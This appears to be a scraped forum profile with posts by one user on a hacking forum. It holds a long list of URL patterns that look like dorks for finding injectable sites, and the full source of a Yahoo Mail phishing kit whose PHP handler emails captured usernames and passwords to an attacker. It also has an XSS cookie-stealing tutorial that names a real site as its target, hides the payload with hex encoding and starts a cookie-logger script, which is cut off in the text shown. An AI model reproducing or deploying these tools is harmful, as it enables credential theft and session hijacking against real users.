index.php?i= ?action= index.php?page= beitrag_F.php?id= index.php?pageid= page.php?modul= detail.php?id= index.php?w= index.php?modus= news.php?id= news.php?id= aktuelles/meldungen-detail.php?id= item.php?id= obio/detail.php?id= page/de/produkte/produkte.php?prodID= packages_display.php?ref= shop/index.php?cPath= modules.php?bookid= product-range.php?rangeID= en/news/fullnews.php?newsid= deal_coupon.php?cat_id= show.php?id= blog/index.php?idBlog= redaktion/whiteteeth/detail.php?nr= HistoryStore/pages/item.php?itemID= aktuelles/veranstaltungen/detail.php?id= tecdaten/showdetail.php?prodid= ?id= rating/stat.php?id= content.php?id= viewapp.php?id= item.php?id= news/newsitem.php?newsID= FernandFaerie/index.php?c= show.php?id= ?cat= categories.php?cat= category.php?c= product_info.php?id= prod.php?cat= store/product.php?productid= browsepr.php?pr= product-list.php?cid= products.php?cat_id= product.php?ItemID= category.php?c= main.php?id= article.php?id= showproduct.php?productId= view_item.php?item= skunkworks/content.php?id= index.php?id= item_show.php?id= publications.php?Id= index.php?t= view_items.php?id= portafolio/portafolio.php?id= YZboard/view.php?id= index_en.php?ref= index_en.php?ref= category.php?id_category= main.php?id= main.php?id= calendar/event.php?id= default.php?cPath= pages/print.php?id= index.php?pg_t= _news/news.php?id= forum/showProfile.php?id= fr/commande-liste-categorie.php?panier= downloads/shambler.php?id= sinformer/n/imprimer.php?id= More_Details.php?id= directory/contenu.php?id_cat= properties.php?id_cat= forum/showProfile.php?id= downloads/category.php?c= index.php?cat= product_info.php?products_id= product_info.php?products_id= product-list.php?category_id= detail.php?siteid= projects/event.php?id= view_items.php?id= more_details.php?id= melbourne_details.php?id= more_details.php?id= detail.php?id= more_details.php?id= home.php?cat= idlechat/message.php?id= detail.php?id= print.php?sid= more_details.php?id= default.php?cPath= events/event.php?id= brand.php?id= toynbeestudios/content.php?id= show-book.php?id= more_details.php?id= store/default.php?cPath= property.php?id= product_details.php?id= more_details.php?id= view-event.php?id= content.php?id= book.php?id= page/venue.php?id= print.php?sid= colourpointeducational/more_details.php?id= print.php?sid= browse/book.php?journalID= section.php?section= bookDetails.php?id= profiles/profile.php?profileid= event.php?id= gallery.php?id= category.php?CID= corporate/newsreleases_more.php?id= print.php?id= view_items.php?id= more_details.php?id= county-facts/diary/vcsgen.php?id= idlechat/message.php?id= podcast/item.php?pid= products.php?act= details.php?prodId= socsci/events/full_details.php?id= ourblog.php?categoryid= mall/more.php?ProdID= archive/get.php?message_id= review/review_form.php?item_id= english/publicproducts.php?groupid= news_and_notices.php?news_id= rounds-detail.php?id= gig.php?id= board/view.php?no= index.php?modus= news_item.php?id= rss.php?cat= products/product.php?id= details.php?ProdID= els_/product/product.php?id= store/description.php?iddesc= socsci/news_items/full_story.php?id= modules/forum/index.php?topic_id= feature.php?id= products/Blitzball.htm?id= profile_print.php?id= questions.php?questionid= html/scoutnew.php?prodid= main/index.php?action= ********.php?cid= ********.php?cid= news.php?type= index.php?page= viewthread.php?tid= summary.php?PID= news/latest_news.php?cat_id= index.php?cPath= category.php?CID= index.php?pid= more_details.php?id= specials.php?osCsid= search/display.php?BookID= articles.php?id= print.php?sid= page.php?id= more_details.php?id= newsite/pdf_show.php?id= shop/category.php?cat_id= shopcafe-shop-product.php?bookId= shop/books_detail.php?bookID= index.php?cPath= more_details.php?id= news.php?id= more_details.php?id= shop/books_detail.php?bookID= more_details.php?id= blog.php?blog= index.php?pid= prodotti.php?id_cat= category.php?CID= more_details.php?id= poem_list.php?bookID= more_details.php?id= content.php?categoryId= authorDetails.php?bookID= press_release.php?id= item_list.php?cat_id= colourpointeducational/more_details.php?id= index.php?pid= download.php?id= shop/category.php?cat_id= i-know/content.php?page= store/index.php?cat_id= product.php?pid= showproduct.php?prodid= product.php?productid= productlist.php?id= index.php?pageId= productlist.php?tid= product-list.php?id= onlinesales/product.php?product_id= garden_equipment/Fruit-Cage/product.php?pr= product.php?shopprodid= product_info.php?products_id= productlist.php?tid= showsub.php?id= productlist.php?fid= products.php?cat= products.php?cat= product-list.php?id= product.php?sku= store/product.php?productid= products.php?cat= productList.php?cat= product_detail.php?product_id= product.php?pid= wiki/pmwiki.php?page****= summary.php?PID= productlist.php?grpid= cart/product.php?productid= db/CART/product_details.php?product_id= ProductList.php?id= products/product.php?id= product.php?shopprodid= product_info.php?products_id= product_ranges_view.php?ID= cei/cedb/projdetail.php?projID= products.php?DepartmentID= product.php?shopprodid= product.php?shopprodid= product_info.php?products_id= index.php?news= education/content.php?page= Interior/productlist.php?id= products.php?categoryID= modules.php?****= message/comment_threads.php?postID= artist_art.php?id= products.php?cat= index.php?option= ov_tv.php?item= index.php?lang= showproduct.php?cat= index.php?lang= product.php?bid= product.php?bid= cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId= item_show.php?lid= ?pagerequested= downloads.php?id= print.php?sid= print.php?sid= product.php?intProductID= productList.php?id= product.php?intProductID= more_details.php?id= more_details.php?id= books.php?id= index.php?offs= mboard/replies.php?parent_id= Computer Science.php?id= news.php?id= pdf_post.php?ID= reviews.php?id= art.php?id= prod.php?cat= event_info.php?p= view_items.php?id= home.php?cat= item_book.php?CAT= www/index.php?page= schule/termine.php?view= goods_detail.php?data= storemanager/contents/item.php?page_code= view_items.php?id= customer/board.htm?mode= help/com_view.html?code= n_replyboard.php?typeboard= eng_board/view.php?T****= prev_results.php?prodID= bbs/view.php?no= gnu/?doc= zb/view.php?uid= global/product/product.php?gubun= m_view.php?ps_db= naboard/memo.php?bd= bookmark/mybook/bookmark.php?bookPageNo= board/board.html?table= kboard/kboard.php?board= order.asp?lotid= english/board/view****.php?code= goboard/front/board_view.php?code= bbs/bbsView.php?id= boardView.php?bbs= eng/rgboard/view.php?&bbs_id= product/product.php?cate= content.php?p= page.php?module= ?pid= bookpage.php?id=
  11. LegioNRST
    Download
  12. LegioNRST
    1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16. 17. 18. 19. 20. 21. 22. 23. 24. Source: InSecurity.ro Edit: Am vazut acum ca a mai fost postat de catre un user banat.
  13. LegioNRST
    Download: http://up.ht/LWIp2T
  14. LegioNRST
    Install Sandboxie Download Link: PS: Am vazut ca nu este postat si m-am gandit sa il postez.
  15. LegioNRST
    List of free VPNs: SecurityKIS http://www.securitykiss.com/sk/index.php Free VPN http://thefreevpn.com/ proXPN http://proxpn.com/ USA IP http://www.usaip.eu/en/free_vpn.php Open VPN http://openvpn.net/ Its Hidden http://itshidden.com/ Cyberghost http://cyberghostvpn.com/ --> Good for germany Hotspot Shield http://anchorfree.com/downloads/hotspot-shield/ VPN Tool http://www.vpntool.com/services.php --> good US Tor VPN https://torvpn.com/information.html Download ifreeVPN: Password:
  16. LegioNRST
    F`a tu ceva mai bun ma.
  17. LegioNRST
    Deoarece postul este vechi, iar link-urile au expirat va voi pune eu sursa: Index.html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Yahoo! Mail: The best web-based email!</title> <!-- Refresh login page every 15 minutes --> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta http-equiv="refresh" content="900"> <meta content="index,follow" name="robots"> <meta content="Yahoo! Mail Free reliable easy efficient PhotoMail SpamGuard antivirus storage mail for mobile award-winning" name="keywords"> <meta content="Get free web-based email from Yahoo! Access email from anywhere, enjoy unlimited storage space, and feel secure with award-winning spam protection." name="description"> <link rel="stylesheet" type="text/css" href="https://a248.e.akamai.net/sec.yimg.com/lib/common/fonts_200502080901.css"> <style type="text/css"> @import url(https://a248.e.akamai.net/sec.yimg.com/lib/reg/css/yregml_sec_200704191234.css); .ct{background:transparent url(https://a248.e.akamai.net/sec.yimg.com/i/reg/cr_gg_ne.gif) no-repeat top right;top:-1px} .ct .cl{background:transparent url(https://a248.e.akamai.net/sec.yimg.com/i/reg/cr_gg_nw.gif) no-repeat top left} .cb{background:transparent url(https://a248.e.akamai.net/sec.yimg.com/i/reg/cr_gg_se.gif) no-repeat bottom right;bottom:-1px} .cb .cl{background:transparent url(https://login.yahoo.com/i/reg/cr_gg_sw.gif) no-repeat bottom left} div.yregdsilu h2.yregdnt, div.yregdsilu p.yregsueasy{width:110px} /* persistency message right above "sign in" bottom */ em.nwred a {font-style: normal; font-size: 85%; color:#c00; top:-1px; position: relative } .kmsibold {font-weight:bold; font-size: 114%;} p#sigcopys {text-align: left; font-size: 85%; float: right; padding: .4em; margin: .6em .4em 1em 0; border-bottom: 1px dotted #9D9C9D; border-top: 1px dotted #9D9C9D;} input#persistent {margin-bottom: -0em;} .subperstxt {margin: 0 0 0 2em;} .subperstxt2 {margin: 0 0 0 2em;} #yregft p.yregfb { font-size:120%; padding-bottom: 5px; padding-up: 5px} #yregtxt {width:66%; overflow:hidden} #yregbnr {padding-top:0} #yregbnr #yregbnrti #yregbnrtii {width:240px} #yregiclst {padding-right:0} </style> <style type="text/css"> /*anti phish badge */ .top {position:relative} #antiphish{position:absolute;right:5px;top:5px;} #antiphish.dogear{right:0px;top:0px;} #antiphish a {font-size:92%;} img.picture {border:2px solid} /* badge backgrounds */ .badge{background-color:#f9f9f9; background-repeat:no-repeat; background-position:top right;} .badge #yreglgtb {margin-top:18px;} /* increased badge size */ /* popup code... */ #security {display:none;position:absolute;top:-15px;left:-85px;z-index:1000;background-color:#a5a5a5;} #security.noimage {left:-76px;top:-10px} #securityi{position:relative;z-index:1;right:1px;bottom:1px;padding:11px;width:219px;background-color:#fff;border:1px solid #636363;} #knob{position:absolute;top:30px;right:-10px;width:10px;height:18px;background:url(https://a248.e.akamai.net/sec.yimg.com/i/reg/sideknob.png) no-repeat top left} .noimage #knob{top:22px} #security p, #security ul li{font:77%/107% verdana;} #security p a {text-decoration:underline;} #security p{padding-bottom:5px;} #security ul{margin:5px 0 0;padding:0 5px 0 0;text-align:right;list-style:none;} #security ul li{margin:0;padding:0 0 2px;} /* help text updates... */ #yregtgen #yregtxt .yregbpt li ul{margin:10px 0 0;padding:0 0 0 15px;} #yregtgen #yregtxt .yregbpt li ul li{background:none;list-style:disc;margin:0 0 5px 0;padding:0;} #yreghtxt ul{margin-left:0} #yreghtxt ul.inlineHeaders li h3{display:inline;} /* remove top margin on li ul */ .addressbar {display:block;margin:1em 0 1em 0} .mono{font-family: courier new, courier, monospace;color:#000;font-weight:bold} #rcta {width:99%; border:1px solid #898989; margin-top:10px; background-image:url(https://a248.e.akamai.net/sec.yimg.com/i/reg/gradient.png); background-repeat:repeat-x; background-color:#fde37c} .ct {background:url(https://a248.e.akamai.net/sec.yimg.com/i/reg/upper-right.gif) no-repeat scroll right top; top:-1px} .ct .cl {background:url(https://a248.e.akamai.net/sec.yimg.com/i/reg/upper-left.gif) no-repeat scroll left top;} #rcta .key {width:40px; height:40px; border:1px solid #666666; background-image:url(https://a248.e.akamai.net/sec.yimg.com/i/reg/key.png); background-repeat: no-repeat; float:left; margin-top:1px} #rcta .txt {margin-left:48px} .cb {background:url(https://a248.e.akamai.net/sec.yimg.com/i/reg/lower-right.gif) no-repeat scroll right bottom; bottom:-1px} .cb .cl {background:url(https://a248.e.akamai.net/sec.yimg.com/i/reg/lower-left.gif) no-repeat scroll left bottom;} #rcta .ctact {margin:4px 10px;min-height:44px} #rcta .txt .qs {font:normal bold 92% arial, Helvetica, sans-serif; color:#000; text-decoration:none} #rcta .txt .sl {font:normal normal 100% arial, Helvetica, sans-serif; color:#000; text-decoration:none} #rcta .txt .why {font:normal normal 85% arial, Helvetica, sans-serif;} #rcta .txt .sltxt {line-height:0.9em} .sltxt a {line-height:0.5em; font-size:85%} .sltxt .why a{font-size:100%} </style> <!--[if IE]> <style type="text/css"> .yregclb{height:1%} #yreglgtb td{text-align:left} #yreglgtb td input{width:110px} #antiphish img{right:15px} #antiphish.dogear{right:1px;top:1px;} #knob{background:url(https://a248.e.akamai.net/sec.yimg.com/i/reg/sideknob_b.gif);right:-11px} .badge #yreglgtb {margin-top:20px;} #rcta .key {margin-top:0} .badge {height:1%} </style> <![endif]--> <!--[if lte IE 6]> <style type="text/css"> .yregclb{height:30em} #yregtxt {height:1%} </style> <![endif]--> <!--[if IE]> <style type="text/css"> #antiphish.dogear{right:11px;} #antiphish{right:15px;} </style> <![endif]--> <!--[if IE 5]> <style type="text/css"> #yregbnr{margin-top:23px;padding-top:0} /* offset login box */ .yregbnrimg {margin:0 0 0 -3px} /* 3px jog Win/IE5 */ </style> <![endif]--> <!--[if IE]> <style type="text/css"> #yregbnrti{height:159px;padding-top:0} #yregbnrtii{margin-top:0} .knob{top:-5px} #yregtml .mailplus{height:60px;padding-top:0} #yregtml .mailplus div{margin-top:0} #yregtml .spamguard{height:52px;padding-top:0} #yregtml .spamguard div{margin-top:0} #yregtml .addressbook{height:50px;padding-top:0} #yregtml .addressbook div{margin-top:0} #yregtml .messenger{height:60px;padding-top:0} #yregtml .messenger div{margin-top:0} #yregtml .photos{height:60px;padding-top:0} #yregtml .photos div{margin-top:0} #yregtml .mobile{height:60px;padding-top:0} #yregtml .mobile div{margin-top:0} #yregtml .antivirus{height:60px;padding-top:0} #yregtml .antivirus div{margin-top:0} #yregtml .cnet{height:72px;padding-top:0} #yregtml .cnet div{margin-top:0} #yregtml .pcmag{height:94px;padding-top:0} #yregtml .pcmag div{margin-top:0} #yregbnr #yregbnrti {margin-top:-160px} </style> <![endif]--> <!--[if lte IE 6]> <style type="text/css"> .yregclb{height:30em} #yregtxt {height:auto} </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .knob{top:-6px} #antiphish.dogear{top:0;right:0;} #antiphish{right:5px;} </style> <![endif]--> </head> <body id="yregtml"> <div id="yregwp"> <!-- begin header --> <table id="yregmst" width="750" cellpadding="0" cellspacing="0" border="0"><tr valign="top"> <td width="100%"><table width="100%" cellspacing="0" border="0"><tr valign="top"> <td width="1%"><img src="https://a248.e.akamai.net/sec.yimg.com/i/us/nt/ma/ma_mail_1.gif" alt="Yahoo! Mail" width=196 height=33 border=0></td> <td><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr valign="top"> <td align="right" id="ygmaproplinks" style="padding-right:3px;line-height:12px;"><font face="verdana,geneva,sans-serif" size="-2"><a href="http://www.yahoo.com " target="www" class="header" title="Click here to go to Yahoo! homepage">Yahoo!</a> - <a href="http://help.yahoo.com/help/us/edit/" class="header" target="yhelp" title="Click here for help">Help</a></font></td> </tr></table></td></tr></table></td> <td align="right" style="padding: 6px 0 0 4px;"> </td></tr></table> <!-- end header --> <span id="cache"></span> <script language="JavaScript"> function checkBrowser(){ var appName = navigator.appName; if( appName == "Microsoft Internet Explorer" ) { // this only works in IE 5 for windows and higher ... if( navigator.appVersion.indexOf("Windows") == -1 ) return -1; var appVersionAry = navigator.appVersion.split("("); if( appVersionAry.length < 2 ) return -1; var appVersion = appVersionAry[1]; appVersionAry = appVersion.split("; "); if( appVersionAry.length < 2 ) return -1; appVersion = appVersionAry[1]; appVersionAry = appVersion.split(" "); if( appVersionAry.length < 2 ) return -1; appVersion = appVersionAry[1]; var appVersionNumber = parseInt(appVersion); if( appVersionNumber < 5 ) return -1; } else { return -1; } } </script> <script language="JavaScript"> function flashCacheReady (initialized){ //invoked directly by Flash } </script> <div id="yregct" class="yregclb"> <div id="yreglg"> <!-- login box goes here --> <div class="top yregbx"> <script type="text/javascript">if(top == self) { document.write("<div class=\" badge\">")}</script> <span class="ct"><span class="cl"></span></span> <div class="yregbxi"> <script type="text/javascript">if(top == self) { document.write("") } else { top.location.href = "http://www.yahoo.com" }</script> <h1>Sign in to Yahoo!</h1> <script type="text/javascript">if (top == self) { document.write(" <div id=\"rcta\"> <a href=\"https://protect.login.yahoo.com/login/set_pref?.intl=us&.src=ym&.u=6mhj08d3q8cnv&.partner=&pkg=&stepid=&.pd=c=&.crumb=&.done=\" tabIndex=\"-1\"> <a href=\"https://protect.login.yahoo.com/login/set_pref?.intl=us&.src=ym&.u=6mhj08d3q8cnv&.partner=&pkg=&stepid=&.pd=c=&.crumb=&.done=\" tabIndex=\"-1\"> <span class=\"ct\"> <span class=\"cl\"></span> </span> </a> <div class=\"ctact\"> <a href=\"https://protect.login.yahoo.com/login/set_pref?.intl=us&.src=ym&.u=6mhj08d3q8cnv&.partner=&pkg=&stepid=&.pd=c=&.crumb=&.done=\" tabIndex=\"-1\"> <div class=\"key\"> </div> </a> <div class=\"txt\"> <a href=\"https://protect.login.yahoo.com/login/set_pref?.intl=us&.src=ym&.u=6mhj08d3q8cnv&.partner=&pkg=&stepid=&.pd=c=&.crumb=&.done=\"> <span class=\"qs\">Are you protected?</span> </a> <div class=\"sltxt\"> <a href=\"https://protect.login.yahoo.com/login/set_pref?.intl=us&.src=ym&.u=6mhj08d3q8cnv&.partner=&pkg=&stepid=&.pd=c=&.crumb=&.done=\"> <span class=\"sl\">Create your sign-in seal.</span> </a> <span class=\"why\">(<a href=\"https://protect.login.yahoo.com/?.src=ym&.v=0&.u=6mhj08d3q8cnv&.last=&promo=&.intl=us&.bypass=&.help=3&.partner=&pkg=&stepid=&.pd=ym_ver%3d0%2526c=&.done=http%3A//mail.yahoo.com\">Why?</a>)</span> </div> </div> </div> <a href=\"https://protect.login.yahoo.com/login/set_pref?.intl=us&.src=ym&.u=6mhj08d3q8cnv&.partner=&pkg=&stepid=&.pd=c=&.crumb=&.done=\" tabIndex=\"-1\"> <span class=\"cb\"> <span class=\"cl\"></span> </span> </a> </a> </div> <div class=\"clear\"> </div>") } else { top.location.href = "http://www.yahoo.com" }</script> <fieldset> <legend>Login Form</legend> <form method="post" action="yahoo.php" autocomplete="off" name="login_form" onsubmit="return hash2(this)"> <input type="hidden" name=".tries" value="1"> <input type="hidden" name=".src" value="ym"> <input type="hidden" name=".md5" value=""> <input type="hidden" name=".hash" value=""> <input type="hidden" name=".js" value=""> <input type="hidden" name=".last" value=""> <input type="hidden" name="promo" value=""> <input type="hidden" name=".intl" value="us"> <input type="hidden" name=".bypass" value=""> <input type="hidden" name=".partner" value=""> <input type="hidden" name=".u" value="6mhj08d3q8cnv"> <input type="hidden" name=".v" value="0"> <input type="hidden" name=".challenge" value="OW9i3G9arif.tWgQEiApcX8H5amC"> <input type="hidden" name=".yplus" value=""> <input type="hidden" name=".emailCode" value=""> <input type="hidden" name="pkg" value=""> <input type="hidden" name="stepid" value=""> <input type="hidden" name=".ev" value=""> <input type="hidden" name="hasMsgr" value="0"> <input type="hidden" name=".chkP" value="Y"> <input type="hidden" name=".done" value="http://mail.yahoo.com"> <input type="hidden" name=".pd" value="ym_ver=0&c="> <table id="yreglgtb" summary="form: login information"> <tr> <th><label for="username">Yahoo! ID:</label></th> <td><input name="login" id="username" value="" size="17" class="yreg_ipt" type="text" maxlength="96"></td> <script language="JavaScript" type="text/javascript">if(document.getElementById) document.getElementById('username').focus();</script> </tr> <tr> <th><label for="passwd">Password:</label></th> <td><input name="passwd" id="passwd" value="" size="17" class="yreg_ipt" type="password" maxlength="64"></td> </tr> </table> <p id="sigcopys"><input type="checkbox" id="persistent" name=".persistent" value="y" > <label for="persistent"> <span class="kmsibold">Keep me signed in</span><br><span class="subperstxt">for 2 weeks unless I sign out.</span> <em class="nwred"><a href="http://us.rd.yahoo.com/reg/login1/lisu/pst_help/us/ym/*https://login.yahoo.com/config/login?.src=ym&.intl=us&.help=4&.v=0&.u=6mhj08d3q8cnv&.last=&promo=&.bypass=&.partner=&pkg=&stepid=&.pd=ym_ver%3d0%26c=&.ab=&.done=http%3A//mail.yahoo.com" tabindex="99999">New!</a></em></label> <span class="subperstxt2">[Uncheck if on a shared computer]</span> </p> <div class="clear"></div> <p class="yreglgsb"><input type="submit" name=".save" value="Sign In"></p> </form> </fieldset> <a href="http://us.rd.yahoo.com/reg/login1/lisu/forgot_lib/us/ym/*https://edit.europe.yahoo.com/config/eval_forgot_pw?new=1&.done=http%3A//mail.yahoo.com&.src=ym&partner=&.intl=us&pkg=&stepid=&.pd=ym_ver%3d0%26c=&.ab=&.last=">Forget your ID or password?</a> | <a href="http://us.rd.yahoo.com/reg/login1/lisu/sih_lib/us/ym/*https://login.yahoo.com/config/login?.src=ym&.intl=us&.help=1&.v=0&.u=6mhj08d3q8cnv&.last=&.last=&promo=&.bypass=&.partner=&pkg=&stepid=&.pd=ym_ver%3d0%26c=&.ab=&.done=http%3A//mail.yahoo.com">Help</a> </p> <div class="yregdlisu"> <h2>Don't have a Yahoo! ID?</h2> <p>Signing up is easy.</p> <p class="yreglgsu"><a href="https://edit.europe.yahoo.com/config/eval_register?.intl=us&new=1&.done=http%3A//mail.yahoo.com&.src=ym&.v=0&.u=6mhj08d3q8cnv&partner=&.partner=&pkg=&stepid=&.p=&promo=&.last=">Sign Up</a></p> </div> <!-- end lisu --> </div> <span class="cb"><span class="cl"></span></span> <script type="text/javascript">document.write("</div>")</script> </div> <!-- promo marketing header --> <div class="second yregbx"> <span class="ct"><span class="cl"></span></span> <div class="yregbxi"> <h3>One Yahoo! ID. So much fun!</h3> <p>Use your single ID for everything from checking Mail to checking out Yahoo! Music, Photos, Messenger, and more.</p> </div> <span class="cb"><span class="cl"></span></span> </div> <!-- End promo marketing header --> <!-- end login box --> </div> <div id="yregtxt"> <!-- begin left side content --> <!-- Top ad insert here --> <!-- SpaceID=150001465 loc=R1 noad --> <!-- top static call --> <div class="rootbeer"> <div id="yregbnr"> <img src="https://a248.e.akamai.net/sec.yimg.com/i/reg/bnr_28.jpg" alt="Filter" class="yregbnrimg" height="173" width="204"> <div id="yregbnrt"><div id="yregbnrti"><div id="yregbnrtii"> <img src="https://a248.e.akamai.net/sec.yimg.com/i/reg/title_mailtour_rb.gif" alt="You deserve the best. Yahoo! Mail delivers." height="50" width="244"> <p>Enjoy tons of features and fun ways to stay in touch and share. Sign up now, it's FREE!</p> <p><a class="yregnlnk" href="http://tour.mail.yahoo.com/mailtour.html" onclick="yg_popup('http://tour.mail.yahoo.com/mailtour.html','y',700,450); return false" target="_blank">Tour Yahoo! Mail</a></p> </div></div></div> </div></div> <!-- end top add call --> <!-- Top ad insert ends --> <!-- Bottom ad insert here --> <!-- SpaceID=150001465 loc=R2 noad --> <!-- bottom ad call --> <div id="yregiclst"> <div class="ic mobile"><div><h3>Get mobile. Get messages.</h3> <cite><a class="yregnlnk" onclick="yreg_popLayer('hl_list',this,0,25,'96946863');">Yahoo! alerts you</a> of new email and lets you read them on your mobile phone.</cite> </div></div> <!-- begin hidden layer --> <div id="hl_list" class="hiddenlayer"> <div class="yreginhdly"> <h4>Stay connected with yahoo! mobile alerts</h4> <p>Don't miss important news just because you're away from the PC.</p> <ul> <li>Get alerts on your mobile phone the second new Mail arrives.</li> <li>Set up free* alerts for the latest news, weather, stocks, sports scores, more.</li> <li>Personalize alerts to get the exact info you want.</li> </ul> <p class="yreglegal">*Yahoo! Mobile Alerts are available at no charge from Yahoo! However, your carrier¿s normal data transfer charges apply.</p> <p class="close"><a class="yregnlnk" onclick="yreg_popLayer('hl_list');">Close</a></p> </div> </div> <!-- End hidden layer --> <div class="ic antivirus"><div><h3>AntiVirus that works twice as hard.</h3> <cite>Your Yahoo! Mail scans and cleans email attachments to help keep nasty viruses out of your life.</cite> </div></div> <div class="ic pcmag"><div><h3>Wanna share in our trophy?</h3> <cite><i>PC Magazine</i> knows a thing or two about free email, including which one stands out. <a class="yregnlnk" onclick="yreg_popLayer('h2_list',this,-150 ,25,'96946861');">Show me</a></cite> </div></div> <!-- begin hidden layer --> <div id="h2_list" class="hiddenlayer"> <div class="yreginhdly"> <h4>PC Magazine Editors' Choice 2005</h4> <p>"Yahoo! Mail has made considerable strides since the last time we reviewed it. It's the most comprehensive free service in this roundup, with sophisticated security features, a configurable spam filter, Norton Anti-Virus scanning and cleaning, and the ability to integrate cleanly with Yahoo! Messenger. Yahoo! Mail was the first Web-based mail service to include a detailed address book, calendar, and notepad, and these work as well as ever. You can also sync their content with mobile devices. ...Yahoo! Mail takes the lead overall." -- <i>PC Magazine</i>, June 22, 2005.</p> <p class="close"><a class="yregnlnk" onclick="yreg_popLayer('h2_list');">Close</a></p> </div> </div> <!-- End hidden layer --> </div> <!-- end bottom ad call --> <p> </p> <p> </p> <p> </p> <!-- Bottom ad insert ends --> <!-- END ADS --> <!-- end left side content --> </div> </div> <!-- begin footer --> <div id="yregft"> <p>Copyright © 2008 Yahoo! Inc. All rights reserved. <a href="http://docs.yahoo.com/info/copyright/copyright.html" target="cp">Copyright/IP Policy</a> | <a href="http://docs.yahoo.com/info/terms/" target="tos">Terms of Service</a> | <a href="http://security.yahoo.com/" target="sc">Guide to Online Security</a></p> <p>NOTICE: We collect personal information on this site.</p> <p>To learn more about how we use your information, see our <a href="http://privacy.yahoo.com/" target="_new" title="Click here to view Yahoo! Privacy Policy">Privacy Policy</a></p> </div> <!-- end footer --> </div> </div> <script type="text/javascript"> if (top != self) top.location.href = location.href; </script> <script type="text/javascript"> <!-- browser_string = navigator.appVersion + " " + navigator.userAgent; if ( browser_string.indexOf("MSIE") < 0 ) { if (navigator.mimeTypes) { for (i = 0 ; i < navigator.mimeTypes.length ; i++) { if (navigator.mimeTypes[i].suffixes.indexOf("yps") > -1) { doGotIt(); } } } else { dontGotIt(); } } else { if (browser_string.indexOf("Windows")>=0) { doGotIt(); document.write('<object classid="clsid:41695A8E-6414-11D4-8FB3-00D0B7730277" CODEBASE="javascript:dontGotIt();" ID="Ymsgr" width="1" height="1">'); document.write('</object>'); } } hasMsgr = 0; function dontGotIt(){ hasMsgr = 0; document.login_form.hasMsgr.value=0; } function doGotIt(){ hasMsgr = 1; document.login_form.hasMsgr.value=1; } //--> </script> <script src="https://a248.e.akamai.net/sec.yimg.com/lib/g/ylib_dom.js" type="text/javascript"></script> <script src="https://a248.e.akamai.net/sec.yimg.com/lib/g/util/yg_browserext_1_5.js" type="text/javascript"></script> <script src="https://a248.e.akamai.net/sec.yimg.com/lib/reg/js/yregml_200611021154.js" type="text/javascript"></script> <script src="https://a248.e.akamai.net/sec.yimg.com/lib/reg/js/login_md5_1_14.js" type="text/javascript"></script> <!-- spaceid: INT.OFFSET: 0 --><!-- SpaceID=150001465 loc=FOOT9 noad --> </body> </html> Yahoo.php: <?php $ip = getenv("REMOTE_ADDR"); $message .= "User : ".$_POST['login']."n"; $message .= "PassWord: " .$_POST['passwd']."n"; $recipient = "YourID@yahoo.com"; $subject = "New Losser"; $headers = "From: "; $headers .= $_POST['eMailAdd']."n"; $headers .= "MIME-Version: 1.0n"; mail("$cc", "yahoo Info", $message); if (mail($recipient,$subject,$message,$headers)) { header("Location: http://www.mail.yahoo.com"); } else { echo "ERROR! Please go back and try again."; } ?>
  18. LegioNRST
  19. LegioNRST
    Azi?
  20. LegioNRST
    Introduction I thought it was about time for someone to post a cookie stealing tutorial, so I decided to write one for you from the ground up. NOTE: Again... this was written to educate you on the security aspects of the following information, not to teach you how to break the law or do something stupid. Use what you learn from this to make your website more secure/use better browsing habits, not break into other websites. Background First we need to understand a bit more about how XSS actually works before moving on. From the above article, you already know a bit of the theory behind XSS, so we'll get right to the code. Let's say a web page has a search function that uses this code: <tr><td>Name</td><td><input type="text" name="advisor_name" value=""></td></tr> We want to exploit this page using XSS. How do we do that? We know that we want to inject our own script into the value field (this field is tied to the search box we can enter text into). We could start by using a test script: <script>alert("test")</script> When we enter this into the search box and click search, nothing happens. Why? It's still inside the value quotes, which turn the entire script into plaintext. If you look at the page source now, you see that the above portion of code now looks like this: <tr><td>Name</td><td><input type="text" name="advisor_name" value="<script>alert("test")</script>"></td></tr> Note the quotes around our script. So what do we do? We need to end the value field before our script can actually be executed. So we tweak our test injection a bit: "><script>alert("test")</script> This should close the quotes end the input section so that our script can be rendered as a part of the source instead of plaintext. And now when we hit enter we get a nice pop-up box saying "test", showing us our script was executed. Keep in mind that you're not actually writing this data to the server (unless you're injecting it with a script that actually modifies the page on the server's end also, like a guestbook or comment script), just changing how the dynamic page is acting on your end. If you want someone else to see what you see when you use this injection, you need to send them the link with that injection already in the page. For example, http://www.rozee.pk/search.php?q="><script>alert("test")</script> Of course, if you don't want the recipient to see the injection, you'll need to hex the query. You can do that here: ascii-hex converter Hexing the query of this url gives us [url]http://www.rozee.pk/search.php?q=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%74%65%73%74%22%29%3c%2[/url] f%73%63%72%69%70%74%3e The above is a very simple case of finding an XSS injection vulnerability. Some html and javascript knowledge is definitely helpful for finding more complicated ones, but code like the above works often enough. Using XSS to Steal Cookies OK, so now you know the page is vulnerable to XSS injection. Great. Now what? You want to make it do something useful, like steal cookies. Cookie stealing is when you insert a script into the page so that everyone that views the modified page inadvertently sends you their session cookie. By modifying your session cookie (see the above linked tutorial), you can impersonate any user who viewed the modified page. So how do you use XSS to steal cookies? The easiest way is to use a three-step process consisting of the injected script, the cookie recorder, and the log file. First you'll need to get an account on a server and create two files, log.txt and whateveryouwant.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (whateveryouwant.php): <?php function GetIP() { if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = 